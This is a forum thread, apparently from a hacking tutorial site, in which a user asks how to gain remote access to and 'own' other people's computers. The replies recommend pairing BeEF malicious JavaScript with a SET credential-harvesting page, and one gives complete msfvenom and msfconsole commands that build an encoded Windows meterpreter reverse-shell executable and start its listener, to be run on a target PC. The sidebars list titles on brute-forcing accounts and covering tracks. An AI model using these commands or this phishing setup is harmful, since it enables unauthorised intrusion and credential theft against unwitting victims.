Hey guys this is thirdlion! I have a pretty good knowledge of computers. I have spent a decent amount of time trying to hack an old Windows XP computer with Metasploit. I have followed several how-tos but I have had no success. I am sure there are other hacking methods and tricks then just Metasploit. Could anyone point me to a tutorial?
Forum Thread: How Should I Start Hacking?
- Hot
- Active
-
Forum Thread: How to Track Who Is Sms Bombing Me . 4 Replies
1 mo ago -
Forum Thread: Removing Pay-as-You-Go Meter on Loan Phones. 1 Replies
2 mo ago -
Forum Thread: Hydra Syntax Issue Stops After 16 Attempts 3 Replies
2 mo ago -
Forum Thread: moab5.Sh Error While Running Metasploit 17 Replies
3 mo ago -
Forum Thread: Execute Reverse PHP Shell with Metasploit 1 Replies
4 mo ago -
Forum Thread: Install Metasploit Framework in Termux No Root Needed M-Wiz Tool 1 Replies
5 mo ago -
Forum Thread: Hack and Track People's Device Constantly Using TRAPE 35 Replies
5 mo ago -
Forum Thread: When My Kali Linux Finishes Installing (It Is Ready to Boot), and When I Try to Boot It All I Get Is a Black Screen. 8 Replies
6 mo ago -
Forum Thread: HACK ANDROID with KALI USING PORT FORWARDING(portmap.io) 12 Replies
7 mo ago -
Forum Thread: Hack Instagram Account Using BruteForce 208 Replies
7 mo ago -
Forum Thread: Metasploit reverse_tcp Handler Problem 47 Replies
9 mo ago -
Forum Thread: How to Train to Be an IT Security Professional (Ethical Hacker) 22 Replies
9 mo ago -
Metasploit Error: Handler Failed to Bind 41 Replies
9 mo ago -
Forum Thread: How to Hack Android Phone Using Same Wifi 21 Replies
10 mo ago -
How to: HACK Android Device with TermuX on Android | Part #1 - Over the Internet [Ultimate Guide] 177 Replies
10 mo ago -
How to: Crack Instagram Passwords Using Instainsane 36 Replies
10 mo ago -
Forum Thread: How to Hack an Android Device Remotely, to Gain Acces to Gmail, Facebook, Twitter and More 5 Replies
10 mo ago -
Forum Thread: How Many Hackers Have Played Watch_Dogs Game Before? 13 Replies
10 mo ago -
Forum Thread: How to Hack an Android Device with Only a Ip Adress 55 Replies
11 mo ago -
How to: Sign the APK File with Embedded Payload (The Ultimate Guide) 10 Replies
11 mo ago
-
How To: Scan for Vulnerabilities on Any Website Using Nikto
-
How To: Make Your Own Bad USB
-
How To: Use Burp & FoxyProxy to Easily Switch Between Proxy Settings
-
How to Hack Wi-Fi: Get Anyone's Wi-Fi Password Without Cracking Using Wifiphisher
-
How To: Use Kismet to Watch Wi-Fi User Activity Through Walls
-
How to Hack Wi-Fi: Cracking WPA2 Passwords Using the New PMKID Hashcat Attack
-
How To: Automate Wi-Fi Hacking with Wifite2
-
How to Hack Wi-Fi: Cracking WPA2-PSK Passwords Using Aircrack-Ng
-
How To: Gain SSH Access to Servers by Brute-Forcing Credentials
-
How to Hack Wi-Fi: Creating an Evil Twin Wireless Access Point to Eavesdrop on Data
-
How To: Use RedRabbit for Pen-Testing & Post-Exploitation of Windows Machines
-
How To: Build a Beginner Hacking Kit with the Raspberry Pi 3 Model B+
-
How To: Clear the Logs & Bash History on Hacked Linux Systems to Cover Your Tracks & Remain Undetected
-
How To: Gather Information on PostgreSQL Databases with Metasploit
-
How To: Crack WPA & WPA2 Wi-Fi Passwords with Pyrit
-
How To: Run Your Favorite Graphical X Applications Over SSH
-
The Hacks of Mr. Robot: How Elliot & Fsociety Made Their Hack of Evil Corp Untraceable
-
How To: Check Your MacOS Computer for Malware & Keyloggers
-
How To: Create a USB Mouse Jiggler to Keep a Target Computer from Falling Asleep (& Prank Friends Too)
-
How To: Use Maltego to Target Company Email Addresses That May Be Vulnerable from Third-Party Breaches
6 Responses
The point you are missing: To learn hacking, you shouldn't just see how to's. You need to really LEARN, not to decorate what you will do. Learn means have the knowledge to choose which method to do in each situation, and not know only one way, and get broken if it's anything different than the way you learned. I don't know whats your point with 'hacking', i don't know what you want to be or do, so, i can't point you anything, for now.
I would like to know how to gain remote access to a computers and own the box. I have spent a lot of time learning and nothing has worked. I am more then sure there are other ways to do this then just Metasploit. (Thats all that null byte teaches for hacking computers.) It would be helpful if you could give me some suggestions on were to start and what to learn!
Maybe you should try social engineering. It has been fun for me, and can be easier than exploiting sometimes. Look into using the Social Engineering Toolkit and BeeF. BeeF generates an html tag that activates malicious JavaScript, so to start maybe put that tag in a Credential Harvesting site made with SET.
Metasploit works just fine and if you can't "get it work", maybe you should try again.
It's probably the easiest way to exploit windows PC.
You don't need some ultra detailed tutorial on that.
Open a terminal and type :
msfvenom -p windows/meterpreter/reversetcp LHOST=yourip LPORT=443 -e cmd/powershell_base64 -f exe > root/Desktop/anything.exe
New terminal:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST youripagain
set LPORT 443
exploit
Now you need to run anything.exe on windows PC and that's it.
Ill try it thanks!
I agree with ~JESUS, you need to do a lot of research and not just follow HOW-TOs. What about metapsloit, make sure you enable port-forwarding on port 4444 and always put 4444 for LPORT. Hope it helped and try learning a programming language first, it will be easier to "hack" later on if you know programming languages.
Share Your Thoughts